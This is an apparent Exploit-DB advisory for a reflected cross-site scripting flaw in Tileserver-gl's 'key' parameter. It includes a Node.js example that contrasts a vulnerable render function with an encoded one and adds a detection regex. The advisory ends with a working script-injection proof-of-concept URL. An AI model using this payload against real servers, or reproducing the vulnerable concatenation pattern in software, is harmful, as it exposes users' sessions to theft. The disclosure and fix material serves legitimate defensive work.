Vendor: Tileserver-gl
By: Akash Chathoth
CVSS: 8.8 (HIGH)
CWE: 79 (Reflected Cross-Site Scripting (XSS))
Product Name: Tileserver-gl
Affected Version From: <3.1.0
Affected Version To: 2.6.0
Patch Exists: YES
Related CVE: CVE-2020-15500
CPE: a:maptiler:tileserver-gl
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2021

Tileserver-gl 3.0.0 – ‘key’ Reflected Cross-Site Scripting (XSS)

A reflected cross-site scripting (XSS) vulnerability exists in Tileserver-gl versions <3.1.0: the value of the `key` query parameter is reflected into the server's HTML response without output encoding. An attacker can exploit this by sending a crafted URL to the victim. The URL carries a script fragment in the `key` parameter, and that script executes in the victim's browser in the context of the Tileserver-gl origin when the URL is opened. Such a script can be used to steal the victim's session information or to perform other actions on the victim's behalf.

Mitigation:

The vendor has released a patch that addresses this vulnerability. Users should upgrade to a version that is not affected (3.1.0 or later).
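To show the defect class behind this advisory and the fix that a patch of this kind applies, here is an added example in Node.js (not tileserver-gl's own code). It assumes a hypothetical template that places the `key` query parameter into an attribute of the generated page; `renderVulnerable` models the pre-fix pattern, `renderHardened` URL-encodes the value and then HTML-entity-encodes it before insertion, and `containsInjectedScript` is the check a test suite would run against the response. The input URL is the PoC URL from the advisory.

```javascript
// Added example, not part of the advisory or of tileserver-gl.
// Assumption: the server reflects the `key` query parameter into an
// attribute of a generated HTML page (hypothetical template below).

const ENTITY_MAP = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode the five characters that can break out of an HTML attribute
// value or text node.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Vulnerable pattern: the raw query value is concatenated into the markup,
// so a value containing `">` closes the attribute and the tag and the rest
// of the value is parsed as new HTML.
function renderVulnerable(key) {
  return `<link rel="stylesheet" href="/styles.css?key=${key}">`;
}

// Hardened pattern: the value is first encoded for its URL context, then
// encoded for the HTML attribute it sits in. Either layer alone neutralises
// the advisory's payload; applying both matches the nesting of contexts.
function renderHardened(key) {
  return `<link rel="stylesheet" href="/styles.css?key=${escapeHtml(encodeURIComponent(key))}">`;
}

// Read the `key` parameter the way the PoC URL supplies it.
function extractKey(url) {
  return new URL(url).searchParams.get('key') ?? '';
}

// Detection check for a reflected-XSS regression test: does the rendered
// response contain a script tag?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// PoC URL as given in the advisory.
const POC_URL = 'http://example.com/?key="><script>alert(document.domain)</script>';

const key = extractKey(POC_URL);
console.log('vulnerable:', renderVulnerable(key));
console.log('hardened:  ', renderHardened(key));
```

Run it with `node` and compare the two lines: the vulnerable rendering contains a live `<script>` element, while the hardened one keeps the whole payload inside the attribute as `%22%3E%3Cscript%3E...`, which the browser treats as an opaque query string.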
Source: Exploit-DB raw data

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>